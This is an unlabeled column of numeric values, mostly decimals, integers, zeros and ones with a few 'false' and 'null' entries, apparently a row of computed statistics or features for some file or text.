40.916667
119
0.620502
175
1,473
4.954286
0.32
0.184544
0.145329
0.217993
0.425606
0.38985
0.140715
0.140715
0.140715
0
0
0.008621
0.133741
1,473
35
120
42.085714
0.670846
0.291242
0
0
0
0
0.046717
0
0
0
0
0
0
1
0.058824
false
0
0
0
0.117647
0.352941
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1